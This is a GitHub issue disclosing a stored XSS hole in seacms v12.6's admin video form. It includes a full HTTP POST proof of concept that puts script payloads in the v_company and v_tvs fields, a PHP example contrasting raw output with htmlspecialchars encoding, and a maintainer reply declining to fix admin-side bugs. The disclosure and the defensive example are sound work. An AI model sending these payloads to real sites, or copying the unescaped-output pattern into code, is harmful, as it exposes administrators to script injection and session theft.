HuaQiPro / seacms

海洋cms 海洋影视管理系统 - 免费开源PHP

seacms v12.6 statcode reflected xss vulnerability #14

Open qianxiao996 opened 3 years ago

qianxiao996 commented 3 years ago

An XSS vulnerability was discovered in seacms v12.6.

There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the v_company and v_tvs parameters of /azdorq/admin_video.php?action=save&acttype=asdd

POC 1">

```http
POST /azdorq/admin_video.php?action=save&acttype=add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/5.4.1 NetType/WIFI
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 648
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/azdorq/admin_video.php?action=add
Cookie: PHPSESSID=r8f7t3j9g41831ljekha8qbs6r; XDEBUG_SESSION=PHPSTORM; XLA_CI=a76a0d5d5f24d8e3bd55503a099c8013
Upgrade-Insecure-Requests: 1

v_commend=0&v_name=asdd&v_enname=11&v_color=&v_type=8&v_state=&v_pic=&v_spic=&v_gpic=&v_actor=&v_director=&v_commend=0&v_note=&v_tags=&select3=&v_publishyear=&select2=&v_lang=&select1=&v_publisharea=&select4=&v_ver=&v_hit=0&v_monthhit=0&v_weekhit=0&v_dayhit=0&v_digg=0&v_tread=0&v_len=&v_total=&v_nickname=&v_company=1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&v_tvs=1%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&v_douban=&v_mtime=&v_imdb=&v_score=&v_scorenum=&v_longtxt=&v_psd=&v_try=0&v_money=0&v_vip=&v_playfrom%5B1%5D=&v_playurl%5B1%5D=&m_downfrom%5B1%5D=&m_downurl%5B1%5D=&v_content=%3Cbr+%2F%3E&Submit=%E7%A1%AE%E5%AE%9A%E6%8F%90%E4%BA%A4
```

1. Choose this part and write the poc into the form [image]

2. Submit and view the webpage [image] [image]
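As an added defender-side illustration (this is not code from the seacms project), the PHP snippet below reproduces in outline the output path the report describes: the v_company and v_tvs values from the POC, URL-decoded, are interpolated raw into an input attribute and an element body, and the same rendering is then repeated with HTML encoding at the output point. The `render_vulnerable`, `render_hardened` and `e` functions and the `$submitted` array are constructed for this example; only the field names and the payload come from the report.

```php
<?php
// Added example, not seacms code. Assumes an admin page that stores the
// posted v_company / v_tvs values and later echoes them back into a form.

// Constructed sample input: the report's POC payload after URL decoding.
$submitted = [
    'v_company' => '1"><script>alert(1)</script>',
    'v_tvs'     => '1"><script>alert(2)</script>',
];

// Vulnerable rendering: stored values are concatenated straight into markup.
// The leading `1">` closes the value attribute and the input tag, so the
// rest of the payload is parsed as a new <script> element.
function render_vulnerable(array $row): string
{
    return '<input name="v_company" value="' . $row['v_company'] . '">'
         . '<p>' . $row['v_tvs'] . '</p>';
}

// Output encoder: ENT_QUOTES also encodes the double quote, which is what
// stops the attribute break-out; ENT_SUBSTITUTE avoids returning an empty
// string on invalid UTF-8 (which would silently drop the field).
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened rendering: the same template, every dynamic value encoded on output.
function render_hardened(array $row): string
{
    return '<input name="v_company" value="' . e($row['v_company']) . '">'
         . '<p>' . e($row['v_tvs']) . '</p>';
}

$vuln = render_vulnerable($submitted);
$safe = render_hardened($submitted);

echo "vulnerable: ", $vuln, PHP_EOL;
echo "hardened:   ", $safe, PHP_EOL;

// Regression check a maintainer could keep next to the fix: the encoded
// output must not contain a live <script> tag or an unencoded quote.
assert(strpos($vuln, '<script>') !== false);
assert(strpos($safe, '<script>') === false);
assert(strpos($safe, '&quot;&gt;&lt;script&gt;') !== false);
```

Encoding on output rather than filtering on input is the durable fix here: the same stored value may be rendered in an attribute, in element text or in a JavaScript context, and only the output point knows which escaping rule applies. Filtering `<script>` out of the POST body would leave every other break-out sequence untouched.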

ciweiin commented 3 years ago

Unified reply: back-end (admin-panel) issues are not fixed one by one. If someone can already expose the entire back end, what is the point of running the site at all?